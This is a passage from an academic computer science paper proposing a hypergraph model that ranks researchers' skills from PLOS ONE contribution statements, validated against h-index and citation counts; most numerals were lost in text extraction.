ranking and propose a new model based on hypergraph theory to evaluate the scientific research skills. to validate our skill ranking model, we perform experiments on the plos one dataset and compare the rank of researchers’ skills with their papers’ citation counts and h-index. finally, we analyze the patterns about how researchers’ skill ranking increased over time. our studies also show the change patterns of researchers between different skills. subjects algorithms and analysis of algorithms, computer architecture, social computing keywords hypergraph model, skill ranking, researcher evaluation introduction the burst of development in science contributes to an expansion of knowledge and technology. it also leads to many new disciplines and interdisciplines emerging in universities (lee, xia & roos, ). scientific cross-disciplinary collaboration brings positive effects to improve the productivity and quality of researchers’ outputs. collaboration has become a common phenomenon in people’s daily life for a long time. more and more works are finished with the form of collaboration, such as project and assignment, patent, software development and scientific papers. the patterns of collaboration and teamwork have attracted the interest of researchers in many disciplines (kong et al., ). organizations like funding agencies, universities, enterprises, etc. are also concerned about team-based issues to improve the productivity and boost the profits. many state-of-art works have been proposed to analyze the pattern of collaboration and optimize the team structure. many efforts have been made to analyze and optimize teams in terms of their topology structure (milojević, ; kong et al., ; wang et al., ), which have made great contributions. however, team effectiveness not only depends on the appropriate team topology structure, but also depends on their function component, such as the abilities and skill distributions of team members (li et al., ). some works built, evaluated and refined teams in consideration of both skills of team members and the team topology structure (li et al., ; wang, zhao & ng, ). how to cite this article kong x, liu l, yu s, yang a, bai x, xu b. . skill ranking of researchers via hypergraph. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:xiaomeibai@outlook.com mailto:xiaomeibai@outlook.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. quantifying individual’s ability and impact is a key point for solving the problems of team building, evaluation and refinement. it is also needed in many other practical applications; for example, awards granting, score assessment and scholarship awarding. however, how to evaluate a researcher’s ability with limited resources in the diverse academic circumstance is still under exploration. under the scenario of big scholarly data, a large number of data-driven indices and measures were proposed to evaluate the impact of researchers reliably (xia et al., ). in the early years, h-index (hirsch, ) was proposed to evaluate both the publication quantity and quality of researchers based on the number of papers and the citations of the highly cited paper. a researcher with an index h means that he/she has h published papers and each of them has been cited at least h times. the index has been proved to be a simple but valid measure in evaluating scholars’ scientific impact (bornmann & daniel, ). the h-index has become a frequently used index and has been applied to solve many problems by scholars. besides, many other indices are proposed to evaluate the performance and impact of researchers, such as g-index (egghe, ), s-index (sawilowsky, ) and aif (pan & fortunato, ). another frequently used measure is q parameter (sinatra et al., ), which is a unique parameter to capture the ability and evaluate the impact of a scientist. in recent works, methods of ranking authors in a heterogeneous network have been proposed (meng & kennedy, ; liu et al., ), in which multi-types of vertices and relationships are taken into consideration. however, these measures are proposed to evaluate researchers’ abilities and impact on the macro level. they cannot reflect a researcher’s proficiency with a particular skill. using these measures to solve some practical problems may influence the accuracy of the results. researchers’ skill sets have been used in solving many problems, such as team formation, team member replacement and team refinement (kong et al., ). many researchers use terms extracted from the paper’s keywords and title or conference and journal name as authors’ skills (li et al., ). they only consider a binary relationship between researchers and skills, that is, whether a researcher has a particular skill. however, in real-life practice, the relationship between researcher and skill is more complicated. the skillfulness of an expert should be taken into consideration according to his previous experience. farhadi et al. ( ) proposed a skill grading method in team formation problem. they proposed a complex formula based on the similarity between scholars and their possessed skills to calculate the skillfulness level. many works used authors’ contribution information to measure their impact and analyzed collaboration patterns of authors (persson, ; paul-hus et al., ; rahman et al., ; corrêa jr. et al., ; biswal, ). the contribution information can also be used in credit allocation and ranking authors (sekercioglu, ; dance, ). the contributions are mainly extracted from acknowledgements of papers, or contribution information in journals like plos journals, the british medical journal and the febs journal. other skill evaluation methods are proposed for measuring workers’ skills, where the skills are extracted from job seekers’ resumes in the online job market (zhou et al., ; anderson, ) and online social platform (alvarez-rodríguez & colomo-palacios, ). for example, in economic issues, skills are extracted for analyzing the relationship between skill and wage (anderson, ) kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and reducing the skills gap (zhou et al., ). however, these methods are mainly proposed to solve problems in labor economics, but cannot be used to evaluate the skills for students and researchers. despite their success in evaluating a researcher’s impact and ability to some extent, a fine-grained method that quantifies researchers’ skill level is still needed now. in this paper, we analyze the factors affecting scientific skill ranking, and construct a heterogeneous network for mapping them into a hypergraph. we present measures to calculate the weights of the edges in the heterogeneous network. the degree of skillfulness for a researcher is denoted as the weight of the hyperedge, which is calculated by a method inspired from the laplace kernel function. our contributions are summarized as follows: • model establishment. we carry out data and empirical analysis on the features that influence the proficiency of researchers’ skills, and then we establish a skill ranking model (srmodel) to evaluate the skillfulness of researchers via hypergraph. • dataset construction. we construct a dataset by crawling information from plos one journal website, including , papers authored by , researchers with kinds of skills aggregated by contributions. • skill ranking analysis. we perform our model on the plos one journal dataset to validate the effectiveness of the model and the pattern of how scholars’ skill ranking increased over time. background facing the highly competitive academic society, researchers have to master a wider variety of skills and knowledge to improve personal strength. besides, the discipline integration and the researcher’s skill migration have become a trend in academia with the rapid development of science and technology. it is a great challenge to rank skills of researchers under such complex conditions. in this part, we aim at figuring out what influence the researchers’ skill ranking according to data analysis and empirical analysis. we use data collected from the plos one journal website to make an investigation and carry out our analysis. the plos one dataset contains over , articles collected from the journal website. these papers’ publication years range from to june . the dataset includes paper title, publish year, authors, number of citations, disciplines and more specifically, authors’ contributions. more details will be introduced in the ‘experiment setting’ section. science and technology are playing important roles in promoting the growth of productivity owing to the unprecedented achievement the researchers have made recently. this development tendency also leads to a burst of complex tasks that need to be solved by working together among experts in different fields. the disciplinary collaboration has reduced the boundaries between disciplines and resulted in a sharp emergence of many marginal disciplines. it is clear that collaboration cross discipline becomes a trend and this will be more frequent in the future. take plos one journal, for example; we extracted the disciplines of the plos one paper on their website, and the statistics of those , papers are shown in fig. . there are only , papers in a single field, and a large number of papers cross – fields. kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the distribution of number of fields for all the papers. full-size doi: . /peerjcs. /fig- it has been found that collaborations cross disciplines have brought many competitive and high-quality outputs (yegros-yegros, rafols & d’este, ; nicolini, mengis & swan, ). first, the development of the collaborative relationships between multi-disciplines makes researchers realize the advantages of resource sharing, which can make a better data and knowledge utilization either within a team or in the whole society. the efficiency and outputs of the team are also improved under the cross-disciplinary scenario. second, cross-disciplinary collaboration can bring creative ideas to researchers and produce more novel outputs for teams. researchers from different fields get strong support from other disciplines during collaboration and discussion. they are more likely to discover valuable problems and create significant innovations because they have less limitation than those who collaborate with researchers in the same field. as cross-disciplinary cooperation has become a trend in academia, discipline is one of the most important factors when considering team-related problems. researchers can learn and use skills of several disciplines in a cross-disciplinary work, which involves knowledge of more than one discipline. however, scientific research varies in different fields, and skills required by each field are diverse. one kind of skill can be different in different fields or disciplines. for example, the skill ‘‘experiment’’ in computer science is totally different from that in biology and chemistry, while another skill ‘‘paper writing’’ is more similar between various disciplines or fields. thus, the skill in different fields has both common features and uniqueness. the diversity of fields and disciplines should be taken into consideration while evaluating researchers’ skills. kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. after taking discipline as an important factor in skill ranking problem, we have two questions: (i) in what aspects it may influence the skill ranking and (ii) how can we quantify a skill’s ranking? firstly, we consider the importance of a skill in a field, which indicates the relevance of skills in each field. as discussed above, the significance of the same skill in different fields varies, which is caused by discipline diversity and speciality. here we suppose that the more frequently a skill is used in a field, the more important it is in that field. thus, we use the rank of times that a skill has been used in a field to quantify its importance in that field. secondly, a researcher always masters multiple skills, and the proficiency of each skill is not equal as well. as a common sense, the more frequently people use a skill, the more proficient they are in it, that is ‘‘skill comes from practice’’. this indicates that the times a researcher use a skill in works are correlated to the skill’s ranking. similarly, we use the rank of times that researchers use a given skill in their works to denote skill’s importance to researchers. besides, the familiarity of researchers with a certain research field is also vital for ranking skills of researchers in different fields. this feature is quantified by the rank of number of papers that a researcher published in a given field. the more papers a researcher has published in a field, the more familiar he/she is with that field. thus, they can perform better and show a higher skill proficiency more easily. according to the above analysis, in order to rank researchers’ skill, field information needs to be taken into consideration. importance of a skill in a field, a researcher’s proficiency of each skill, and the familiarity of a researcher in a field can influence the ranking level of a skill. considering those factors, we propose a novel model to rank researchers’ skill. model this section describes the definition of skill ranking and the concept of hypergraph. we describe our skill ranking model (srmodel) based on the hypergraph in detail. problem definition we define the skill ranking problem as follow: given a complex network h = (v,e,w), where v denotes the vertices, including researchers, fields and skills in our model, e denotes different types of edges, and w denotes weight of the edges. skills indicate the ability a researcher got when he/she took part in some real works. skill ranking problem is to evaluate a researcher’s specific skill in a specific field by ranking methods. it is unconvincing to consider only the pairwise relationship between the researcher and the skill in skill ranking problem. it would be more convincing to take account of three factors. these three factors can be integrated into three kinds of relationships, including relationships between researchers and skills, researchers and fields, fields and skills. in this paper, we use the hypergraph to represent a high order relationship, which is a generation of simple network. a hypergraph can be used to represent the relationships and interactions of two or more nodes. for example, in the citation network, a paper and its reference papers can compose a hyperedge. in music recommendation problem (theodoridis, kotropoulos & kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. panagakis, ; bu et al., ), a user and the music he/she listened along with the music lists compose a hyperedge. similar problems, such as movie recommendation, interest recommendation (yao et al., ), news recommendation (liu & dolan, ; li & li, ), image retrieval (huang et al., ; yu, tao & wang, ), user rating (suo et al., ), scientific ranking (liang & jiang, ), can be solved based on the hypergraph framework. experiments show hypergraph methods are powerful and efficient to model multi-relationship systems. in a hypergraph, an edge, called hyperedge, contains arbitrary number of nodes, rather than pair of nodes in ordinary graphs (huang et al., ). a hypergraph is a group of h =(x,e) where x is a set of vertices and hyperedge e is a set of non-empty subsets of x. in our study, node set x is consisted of researcher set r, field set f and skill set s. each hyperedge includes a researcher, a field and a skill, denoting the ternary relation among them. srmodel our srmodel aims at ranking individual’s different skills using hypergraph model. we consider three kinds of objects and their relations in the model. the objects include researchers, fields and skills, forming the vertex set of the heterogeneous network. in this network, there are three-ary relations between skills, researchers and fields so that normal network structure cannot provide effective representation of this system. in this paper, we use a hypergraph to model the three-ary relations. to construct the hypergraph model, we build a weighted heterogeneous network to calculate the weights of edges first, denoted as h =(v,e,w), where v =r∪f∪s denotes the set of vertices and e ={e|(vi,vj),i = j} denotes the edge set. a simple example of a part of our heterogeneous network is showed in fig. a. vertex set includes three kinds of vertices, i.e., researcher vr, field vf and skill vs. edge set e includes three kinds of edges, i.e., edges between researchers and fields, researchers and skills, fields and skills. to understand the network clearly, the heterogeneous network can be regarded as a ‘‘tripartite network’’, whose vertices can be divided into three independent and unconnected node sets r, f and s. and each edge e(i,j) in network connects vertices i and j in different node sets. there are three types of edges indicating pairwise relationship between different types of nodes. to quantify the importance of the pairwise relationship, we set each kind of edge a weight to express the importance of a node to the other, which is calculated by the ranking of node’s attribute among the others in the same set. one of the three types of edges is e(vsj ,v f i ) between field i and skill j. the weight between a skill and a field is calculated by the percentile ranking of the skill in the field: w (v s j ,v f i )= −γ sf ji /l sf i , ( ) where γ sfji denotes the ranking of the skill j that used in field i, which is calculated by ranking skills according to the times they are used in a field. lsfi is the number of skills that used in the field i. we use the percentile ranking as the normalization to eliminate the influence of different number of skills in different fields. besides, we subtract from γ sfji to make the minimum weight not equal to zero. for example, suppose there are four skills in kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. skill ii skill j field a field bfield c skill i skill j field a field bfield c ba figure example of our model. (a) a simple example of a heterogeneous network containing six ver- tices and hybrid edges. (b) an example of our srmodel, which is built based on the hyperedges. for the relationships between researcher, field and skill, a hyperedge exists only if the researcher process the skill in this field. full-size doi: . /peerjcs. /fig- a field and their ranks are , , and . the weights between those four skills and this field are . , . , . and . , respectively. weight of edge e(vrk,v f i ) between researcher k and field i can be regarded as the importance of the researcher in the field, which is calculated by: w (v r k,v f i )= − √ (γ rfki − )/l rf i , ( ) where γ rfki denotes the ranking of researcher k in field i, which is calculated by ranking researchers according to the numbers of previous works that they have participated in a field. lrfi is the total number of researchers in field i. researchers get experience and knowledge of a field when they take part in works in this field. the more works they have done, the more they learned. we perform normalization by using the percentile ranking to eliminate the influence of different number of researchers in different fields, like in eq. ( ). there are differences between eqs. ( ) and ( ) because we use the square root to re-scale the weight in eq. ( ). the re-scaling operation is to make the distribution of the weight wider because there are many researchers rank in the tail (a large number of beginners). for example, suppose a field m has five experts, and they have published , , , , papers in this field respectively. thus, the weights between those five experts and field m are . , . , . , . , . , respectively. similarly, weight of edge e(vrk,v s j ) between researcher k and skill j represents how important a researcher is in a given skill, computed by: w (v r k,v s j )= − √ (γ rskj − )/l rs j , ( ) where γ rskj denotes the ranking of researcher k with skill j, which is calculated by ranking researchers according to the times they used this skill in their previous works. lrsj denotes the number of researchers with skill j. a hypergraph hh =(x,eh,wh) is built after constructing the heterogeneous network and calculating the weights of edges. a hypergraph built on the heterogeneous network kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. in fig. a is demonstrated in fig. b. in hh, x is a set of hybrid nodes, composed by researcher, skill and field. eh is hyperedge on x, and wh is a weight function of hyperedge. for the relationships between researcher, field and skill, a hyperedge exists only if the researcher processes the skill in this field. we define the weight function of hyperedge inspired by the laplace kernel function, and the distance calculation method in (huang et al., ). the weight function is: w (vrk,v f i ,v s j )=e ,and ( ) = w (vsj ,v f i ) ·w + w (vrk,v f i ) ·w + w (vrk,v s j ) ·w , ( ) where w ,w and w are the average edge weights between fields and skills, researchers and fields, researchers and skills, respectively. based on the above definition and introduction, our srmodel has been formulated. the value of skill ranking of a researcher is calculated by the weight of the hyperedge in the hypergraph. experiment setting in this section, we introduce the dataset we used in our experiment. then, we construct the hypergraph and get the skill sets as well as the skill ranking of researchers. dataset construction previous studies on researcher evaluation usually use datasets of publications to evaluate their methods. these datasets include digital bibliography & library project (dblp), american physical society (aps), microsoft academic graph (mag). however, authors’ skills are unavailable in those prevalent datasets. in the previous work where skills are required, such as team formation problem, team member replacement, collaborators recommendation, researchers usually use terms extracted from keywords, title (farhadi et al., ) or conference and journal name (li et al., ) instead of authors’ real skills. either terms in titles or journal names have limitations to reflect skills of researchers, because the division of the work is not clear. however, there are several journals providing authors’ contribution statement, such as the british medical journal, nature, lancet. besides, journals such as the febs journal and plos journals require authors to declare their contributions in a specified format while submitting the paper. we create a dataset by crawling papers’ information together with their research fields and authors’ individual contributions from the plos one journal website to validate our model, as we mentioned in the background section. plos one journal is an open-access journal, so we can extract information from their website by parsing their html pages of each paper with python. the contribution information of this journal has been used to analyze the authors’ contribution pattern recently (corrêa jr. et al., ; sauermann & haeussler, ). the details of our dataset are shown in table . at first, we remove papers with incomplete information. in the raw dataset, , kinds of contributions are found, and most of them have similar meanings. plos journals recently adopted the credit kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table selected plos one dataset. items raw preprocessed time span - . - . # field # paper , , # author , , # contribution , taxonomy providing standardized and fine-grained information of authors’ contribution (atkins, ), but there are no standard rules for naming paper’s contributions in the early years. using the raw contribution directly may bring inaccuracy. there are items appearing more than times accounting for the vast majority (about %). thus, we cluster kinds of contributions that appear frequently into categories manually. the categories are shown in table . here, we regard these categories of contributions as skills of researchers. the acronyms of authors’ name followed the contributions on the plos one web pages. we match the acronyms up with authors’ full name in author list of each paper. then we get the authors’ skills in every paper. another vital step is name disambiguation. multiple authors may share the same name, and there is no unique identifier for each author in plos one journal. it can cause confusion and even fault if we regard those authors with the same name as one person. many works have employed a variety of features to distinguish authors sharing the same name, such as affiliations, coauthors, topics or research interests (kang et al., ; ferreira, gonçalves & laender, ). to distinguish authors in plos one dataset, the following features are adopted: (i) affiliation: authors with the same name and the same affiliation are regarded as the same authors; (ii) coauthor: if two authors m and m with the same name coauthored one or more papers with a third author n , it is likely that m and m are the same author named m. we combine these two features to disambiguate the authors’ name. there are , authors in the raw dataset, and , authors after naming disambiguation. network construction to construct the srmodel framework using plos one dataset, our experiment consists of four main parts as follows. . construct a heterogeneous network with three kinds of vertices and three kinds of edges. . compute edge weights according to eqs( )–( ). . build a hypergraph hh=(x,eh,wh) and compute hyperedge weights using eq. ( ). . calculate the researchers’ yearly skill ranking w i from to respectively. in the first step, we construct a heterogeneous network including three kinds of vertices and three kinds of relationships. edge between researcher and field/skill exists only if he/she published paper in this field or used this skill at least once. a vertex denoting field vfi and a vertex denoting skill vsj are connected if one or more papers in field i use skill j. there are kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the skills and their composed contributions. skills contributions in plos one dataset data analysis analyzed the data, data curation, statistical analysis, interpretation of data, interpreted the data, data interpretation, interpreted data, analysis and interpretation of data, performed statistical analysis, interpretation of the data, performed the statistical analysis study and experiments design conceived and designed the experiments, designed the study, conceived and designed the study, designed the experiments, conceived the study experiment performing performed the experiments,visualization, performed the experiments paper writing wrote the paper, writing original draft, wrote the manuscript, contributed to the writing of the manuscript, writing - original draft, drafted the manuscript, wrote the first draft of the manuscript software and tools contributed reagents/materials/analysis tools, software, designed the software used in analysis, contributed reagents/materials/analysis tools theory analysis methodology, conceptualization, formal analysis, validation, interpreted the results, interpretation of results paper reviewing writing review & editing, revised the manuscript, writing - review & editing, edited the manuscript, read and approved the final manuscript, reviewed the manuscript, critically revised the manuscript, final approval of the version to be published, etc. items in total data collection investigation, resources, acquisition of data, data collection, collected the data, collected data, obtained permission for use of cell line, sample collection, data acquisition, data acquisition, collected samples, collected the samples supervision supervision, project administration, study supervision, supervised the study, supervised the project, supervised the work funding acquisition funding acquisition, obtained funding, financial support , authors, fields and skills in the heterogeneous network, forming , , edges in total. in the second step, we compute the weights of edges in the constructed network. we compute the weights of field-skill, researcher-field and researcher-skill by eqs. ( )–( ), respectively. we rank the skills in field i by the numbers of papers in field i that using the skills, and for each skill j the ranking is denoted as γ sfji . l sf i is the total number skills in field i. when calculating the weights between researchers and fields, we assume the more paper a researcher published in a field, the more he/she is familiar with the field. thus, we rank the researchers according to the numbers of papers they published in field i, and for researcher k the ranking is denoted as γ rfki . let the total number of researchers in field i as lrfi in eq. ( ). similarly, γ rs kj is the ranking of researcher k using skill j by the number of kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm : algorithm to calculate the skill ranking of researchers input: weight of edges; paper information output: hyperedge weights w =avg(skills,fields); w =avg(researchers,fields); w =avg(researchers,skills); hyperedges= list(); hyperweight =dict(); for paper in dataset do add (researcher, field, skill) to hyperedges; for (r,f ,s) in hyperedges do = w [s,f ] ·w + w [r,f ] ·w + w [r,s] ·w ; weight =e ; hyperweight[r,f ,s]=weight; return hyperweight; papers he published using this skill, and lrsj is the total number of researchers that using skill j in eq. ( ). in the third step, we construct the hypergraph and calculate the skill proficiency of authors. a hyperedge connects a researcher, field and skill if the researcher published papers in this field using this skill. there are , , hyperedges in the constructed hypergraph in total. and the weight of hyperedge is calculated by eq. ( ), representing a researcher’s skill proficiency in a field. the pseudo code of the algorithm to calculate the skill ranking is shown in algorithm . let e denote the number of hyperedges, so the time complexity of constructing a heterogeneous network of skill, field and researcher is o(e). then, building hypergraph based on the network and calculating weights of hyperedges can be performed together. the time complexity of these two steps is also o(e). so the overall time complexity of our skill ranking method is o(e). in fact, the skill ranking that we calculate in the third step is a snapshot at the time when the data are collected. in the last step, we take a snapshot every year to construct a series of hypergraphs and calculate the weights of hyperedges to represent the researchers’ skill rankings at different time, denoted as w i, where i∈[ , ]. that is, the skill ranking of the researcher in a field at year i is calculated by all the papers he published until year i. we use the yearly skill ranking information to analyze the dynamic of researchers’ skill proficiency. also, we can get the researchers’ abilities in the year when the paper was published. result we construct the hypergraph model and then calculate the weight of the hyperedge using it. based on the hyperedge weight, we can calculate the skill ranking of a researcher in a kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table correlation coefficient of skill ranking and h-index skill correlation coefficient experiment performing . data analysis . paper reviewing . paper writing . supervision . theory analysis . funding acquisition . software and tools . study and experiments design . data collection . field. in this section, we validate the effectiveness of the srmodel and carry out several analyses on the ranking results. validation of srmodel we computed the correlation coefficient between researchers’ skill ranking and their h-index and performed a hypothesis test to validate our model’s performance. correlation between skill ranking and h-index to verify the validity of the method, and explore the potential relationship between skill ranking and h-index, we analyze how skill ranking changes with the increase of h-index. plos one is a journal mainly focusing on biology. among the , papers that we obtained in their website, more than , papers are in the field of biology. thus, we use the papers and authors in biology to perform the verification. researchers’ skill rankings are calculated by the data in plos one. but only a fraction of researchers’ papers is published in this journal. it is not reasonable to use authors’ real h-indices to analyze the relationship with their skill rankings. thus, we calculate the h-indices of all the authors in plos one dataset according to the papers they published in this journal and their citation counts. the h-indices of authors in plos one dataset range from to . pearson’s correlation coefficient quantifies the linear correlation between two groups of continuous variables (pearson, ). thus, we calculate the correlation coefficient between skill ranking and h-index, shown in table . we notice that all the correlation coefficients are larger than . , especially for the skill ‘‘data analysis’’, ‘‘paper writing’’ and ‘‘study and experiments design’’, of which the correlation coefficients are larger than . , which indicates a high correlation. this result means that a researcher with a higher h-index often has a higher skill ranking, which suggests that if a researcher is more skillful with academic skills, they can obtain outcomes with higher quality. we then analyze the distribution of skill ranking to prove the rationality of the model. the result is shown in fig. . both of two distribution curves subject to exponential distribution of function y =ea+bx+cx , and the r-square of these two fitting functions is close to , which indicates the fitting degree is high. it means that researchers’ h-index and kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure distributions and fitted lines of h-index (r = . ) and skill ranking (r = . ). the x axes denote the value of h-index and skill ranking, and y axes denote the numbers. both h-index and skill rank- ing are subject to exponential distribution. full-size doi: . /peerjcs. /fig- skill ranking have the same kind of distribution, which also explains the high correlation coefficient between them and the rationality of the srmodel. relationship between skill ranking and citation to validate whether the skill ranking computed by our model is significant for the quality of scholar’s research outputs, we define a hypothesis that there are differences between the citation counts of papers whose authors’ average skill rankings are different. we use the single side t-test, which is also known as ‘‘student test’’ (gosset, ), to test the hypothesis we made. in our experiments, we use papers in biology from to as the sample set. here, firstly we group all papers by their publish years because the citation is highly influenced by paper’s age and we just have the citation counts of paper in we remove the first three years because we don’t have enough papers and researchers in our dataset, and we remove the last two year because the citation counts of these papers are still growing. then, we calculate the average skill ranking of paper’s authors in the year they wrote it for each paper. we split every group into two parts to perform our test. the one consists of papers with authors average skill ranking less than the median value of the group. the other contains the rest of papers. we denote the part of papers with higher authors’ skill ranking as random variable x and the lower papers as x . we perform a t-test with the settings mentioned before. the null hypothesis for testing is h :µ =µ and alternative hypothesis as h :µ >µ , where µ and µ are the mean values of the population of the two groups of random variables we defined above. we use the scipy module in python to do the test (jones, oliphant & peterson, ), which can compute both the statistical value and p-value of the t-test together by function scipy.stats.ttest_ind(x ,x ,equal_var =true). if the p-value is less than a significance level (typically . ), we can reject the null hypothesis and hold the alternative hypothesis h :µ >µ , which means the average citation of papers with higher skill ranking authors are more than papers with authors kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table average citation counts of two groups of samples and their p-value. year avg-low avg-high p-value . . . × − . . . × − . . . × − . . . × − . . . × − . . . × − . . . × − lower skill ranking. but the result of t-test is sensitive to the equality of samples variance. if variances of two groups of samples are not equal, the result needs to be corrected. so before performing the t-test on samples, we do a levene’s test to assess the equality of two groups of variances. if the two variables are not equal, we need to set the parameter equal_val = false in the t-test function to avoid deviation. the average citation counts of two groups of samples are shown in table . papers written by authors with relatively low skill ranking have lower average citation counts. all the p-values in t-test are lower than . , which indicates there are significant differences in sample mean values. thus, the skill ranking of authors influence the citation counts of outputs. analysis of skill ranking increase we define the researcher’s academic age in plos one dataset as the number of years between his first paper and the last paper in this dataset. although plos one is a comprehensive journal with a large number of papers, it cannot include all the papers published by every researcher. there still exist many researchers that published many papers but only one or two in this journal. analyzing the skill rankings of those researchers is meaningless. in order to avoid the defect of the dataset as much as possible, we choose researchers whose academic ages and numbers of published papers are both in the top % respectively, named as ‘‘top researchers’’, to carry out the analysis. in the plos one dataset, there are , ‘‘top researcher’’. we first calculate the yearly change rate of researchers’ skill ranking. the yearly change rate indicates that how much the skill ranking of a researcher increased or decreased compared to that in one year before, defined as i= wi−wi− wi− , where wi is the value of skill ranking in year i and wi− = . we show the distribution of yearly change rate between to % in fig. . the change rate of most researchers’ skills is less than %. the green bar demonstrates a slight decrease existing in the researchers’ skill ranking, because the progress of other researchers decreases the rankings of them. observing the curve of researchers’ skills, we found the skills of most researchers are fluctuating upward, but the rising patterns are different. then, we explore the commonalities and differences of the changes for researchers’ different skills. first, we analyze the rising stages of skills. when a researcher’s skill ranking increased more than % in a year, we call this year a ‘‘fast increase year’’ for his skill. the distribution of the longest continuous rapid growth years of each set of researcher-field-skill is presented kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. c ha ng e r at e number of researcher-field-skill pairs - % - % - % - % - % - % - % - % - % - % > % k k k k k , k , k figure yearly change rate of top researchers’ skills. the x-axis is the number of researcher-field-skill pairs and the y-axis is the change rate. red and blue bars denote the number of increase and decrease sets with the corresponding change rate in y-axis, respectively. full-size doi: . /peerjcs. /fig- in fig. . in fig. , we count the total number of researcher-field-skill sets for different length of time. about thousand researcher-field-skill sets experience one-year rapid growth, and the number of that for two years reduced to around thousand. a few skill sets rise continuously more than five years, including , sets for years and sets for years. the average fast-growing years among the , researcher-field-skill sets for , researchers is . years. that is, it is generally for researchers to spend one or two years putting their energy on one skill to have a good command of it, and then they may focus on other disciplines or other skills. several reasons account for this phenomenon. first, researchers usually change their research fields in their research careers, especially for those interdisciplinary researchers. the transformation of fields can bring researchers more inspiration and creativity. second, for a researcher, as he becomes more and more skillful, the work he undertakes in the team may change. we then explore the skill transfer of researchers. changing patterns of skill ranking then, we explore the changing patterns of different skills. to investigate how skill ranking changes over time, we propose a method to count the average ranking for each skill in different periods. there are three problems needing to be considered. ( ) researchers’ academic ages are different, and the time when they enroll in a skill or field varies. ( ) many researchers didn’t publish paper on plos one at the beginning of their academic career. studying the skill transfer of them is unconvincing. ( ) many researchers didn’t publish papers every year in plos one and the numbers of paper published by researchers are totally different. to solve these problems, we define a researcher’s ‘‘academic stage’’ as the period between years he has published papers. for example, a researcher m published two, five and one papers in , and , respectively, so he has three academic kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure continuous rapid growth years of researchers’ skills. the x-axis denotes the continuous rapid growth years and y-axis denotes the number of researchers’ skills. there are , pairs of (researcher, field, skill) for the , top researchers in total. full-size doi: . /peerjcs. /fig- stages, which are – , – , – . the skill ranking of each stage is indicated by the skill ranking in the first year of the stage. after we got the skill ranking of all the stages for all the top researchers, we calculate the average value in each stage for different skills, and show the result in fig. . we divide the skills into four groups according to their trend. in fig. a we notice that there are five skills of which the ranking keep increasing throughout all academic stage, and the increase rate is higher than other groups, including ‘‘paper writing’’, ‘‘data analysis’’, ‘‘study and experiments design’’, ‘‘experiment performing’’ and ‘‘software and tools’’. it suggests that these five skills are the basic academic skills so that they are important for many researchers throughout their academic careers. the second group, as shown in fig. b, has two skills, ‘‘supervision’’ and ‘‘theory analysis’’. the rankings of these two skills change slowly in the early stages and have a sharp increase at the latter academic stages, which indicates that these two skills need more experience in academia and are harder to develop. figure c is the third group of skills, including ‘‘paper reviewing’’ and ‘‘data collection’’. these two skills’ ranking rise in the early stage and finally falling slightly, especially the skill ‘‘data collection’’, whose increase rate is very small after the fourth stage. we assume that these two skills are easy to get started, and when researchers have more experience they will not use these skills frequently. there is one skill in fig. d, the trend of which is not so obvious. kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average skill ranking in different periods. the x-axis is the stage, and y-axis is the researchers’ average skill ranking in each stage. we divide the skills into four groups according to their trends. (a) ba- sic skills that increase throughout researchers’ academic careers. (b) skills that need more experience to be developed. (c) skills that are easy to get started. (d) a skill whose trend is not so obvious. full-size doi: . /peerjcs. /fig- we think ‘‘funding acquisition’’ has little correlation with time in our dataset. maybe the time span is not long enough to find its changing law. thus, we find the changing patterns of different skills vary. some skills are easy to get started. when researchers have more experience, they will transfer their interests to other skills. some skills are harder to develop, researchers with these skills need to develop other skills first. thus, they develop these skills in their later academic stage. there are also some basic skills are important for many researchers throughout their academic careers. conclusion and future work in this paper, we make both empirical analysis and data analysis to figure out factors affecting the result of skill ranking. then, we construct a model named srmodel based on hypergraph to describe the relationships among researchers, skills and fields. this model can be used to rank a researcher’s scientific skills. we applied our model on the plos one dataset, which is extracted from the journal website. we obtained the weighted field-skill kong et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. sets for each researcher. we validated our method by correlation analysis with h-index and hypothesis test. then, we use the results to analyze the increase of skill ranking and patterns of skill ranking change. skill ranking can be applied to many practical problems, such as collaborator recommendation, team formation, team member replacement and team refinement. in problems where skill similarity is required, the researcher’s proficiency in each skill can make the results more precise. in other problems where skill grading is needed, a fine-grained method can lead to a better result. in future work, we will use our model to solve some practical problems and examine its reliability and effectiveness. datasets of other disciplines like software engineering and physics can be taken into consideration to verify the validity of the model. besides, more factors and relationships will be taken into consideration to rank skills. additional information and 